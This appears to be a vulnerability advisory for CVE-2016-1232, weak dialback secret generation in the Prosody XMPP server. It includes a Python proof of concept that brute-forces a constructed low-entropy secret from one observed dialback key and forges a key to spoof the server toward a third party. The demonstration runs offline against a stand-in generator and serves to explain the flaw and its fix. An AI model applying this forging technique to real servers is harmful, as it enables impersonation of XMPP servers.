Authentication Spoofing in Prosody XMPP Server due to Insecure Secret Token Generation
CVE-2016-1232

7.5 HIGH

Key Information:

Vendor: Prosody
Status: Vendor
CVE Published: 12 January 2016

What is CVE-2016-1232?

The mod_dialback module in Prosody before 0.9.9 does not properly generate random values for the secret token used in server-to-server (s2s) dialback authentication (XEP-0220). Because the secret has far less entropy than intended, an attacker who obtains a dialback key the affected server has issued (for example by operating a receiving server that the Prosody instance connects to) can recover the secret by brute force, then compute valid dialback keys for any stream and spoof that server toward other XMPP servers. Upgrading to Prosody 0.9.9 or later, which generates the secret securely, removes the weakness.
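To make the attack concrete, the following added example (illustrative code, not Prosody's own; the weak generator is a constructed stand-in with a 16-bit search space, not the actual flawed routine) implements the XEP-0185 dialback key derivation, recovers a low-entropy secret from a single observed key, and shows that the recovered secret yields a valid key for a fresh stream toward a third server. Domain names and stream IDs are made up.

```python
import hashlib
import hmac
import secrets


def dialback_key(secret: bytes, receiving: str, originating: str, stream_id: str) -> str:
    """XEP-0185 dialback key: HMAC-SHA256 keyed with SHA-256(secret) over
    'receiving_domain originating_domain stream_id'."""
    msg = f"{receiving} {originating} {stream_id}".encode()
    return hmac.new(hashlib.sha256(secret).digest(), msg, hashlib.sha256).hexdigest()


def weak_secret(seed: int) -> bytes:
    """Constructed stand-in for a low-entropy secret generator: only 2**16
    distinct secrets are possible, so an offline search is trivial."""
    return f"{seed:04x}".encode()


def strong_secret() -> bytes:
    """What a fixed server should do: 256 bits from the OS CSPRNG."""
    return secrets.token_bytes(32)


def recover_secret(observed_key: str, receiving: str, originating: str,
                   stream_id: str, space: int = 1 << 16):
    """Attacker side: brute-force the weak secret from one observed
    (stream_id, key) pair. Returns the secret or None."""
    for seed in range(space):
        candidate = weak_secret(seed)
        if hmac.compare_digest(
                dialback_key(candidate, receiving, originating, stream_id),
                observed_key):
            return candidate
    return None


def demo():
    victim = "prosody.example"        # affected originating server (hypothetical)
    attacker = "attacker.example"     # receiving server run by the attacker
    third_party = "thirdparty.example"

    # The victim connects to the attacker's server and sends a dialback key
    # computed from its (weak) secret for the stream ID the attacker issued.
    secret = weak_secret(0xBEEF)
    observed = dialback_key(secret, attacker, victim, "D60000229F")

    # Offline brute force recovers the secret from that single key.
    recovered = recover_secret(observed, attacker, victim, "D60000229F")

    # The attacker now connects to a third server claiming to be the victim;
    # the key it presents will verify when that server dials back to the victim.
    forged = dialback_key(recovered, third_party, victim, "NEWSTREAM1")
    genuine = dialback_key(secret, third_party, victim, "NEWSTREAM1")
    return recovered, forged == genuine


if __name__ == "__main__":
    print(demo())
```

With a secret from `strong_secret()` the same `recover_secret` search has no realistic chance of success, which is the whole of the fix: the derivation in XEP-0185 is sound, but only as strong as the entropy of the secret behind it.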

CVSS V3.1

Score: 7.5
Severity: HIGH
Confidentiality: High
Integrity: None
Availability: None
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
